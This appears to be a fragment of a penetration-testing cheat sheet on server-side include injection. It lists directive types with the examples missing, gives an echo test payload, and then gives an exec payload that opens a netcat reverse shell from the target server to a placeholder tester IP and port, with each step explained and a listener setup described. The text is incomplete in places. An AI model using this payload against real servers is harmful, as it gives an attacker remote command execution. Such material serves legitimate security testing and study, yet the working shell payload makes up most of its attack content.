- Date:
- Modification date of a file:
- CGI Program results:
- Including a footer:
- Executing commands:
- Setting variables:
- Including virtual files (same directory):
- Including files (same directory):
- Print all variables:
- Use the SSI directives as payload. If the expected values are returned, the application is vulerable.
<!--#echo var="DATE_LOCAL" -->- Confirm the vulnerability with the payload
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->
- mkfifo /tmp/foo: Create FIFO special file.
- nc <IP> <PORT> 0</tmp/foo: Connect to the pentester machine, redirect standard input.
- | bin/bash 1>/tmp/foo: Execute /bin/bash, redirect standard output to /tmp/foo.
- rm /tmp/foo: Cleanup FIFO file.
- Set up the Netcat listener on the attacking machine and there should be a connection.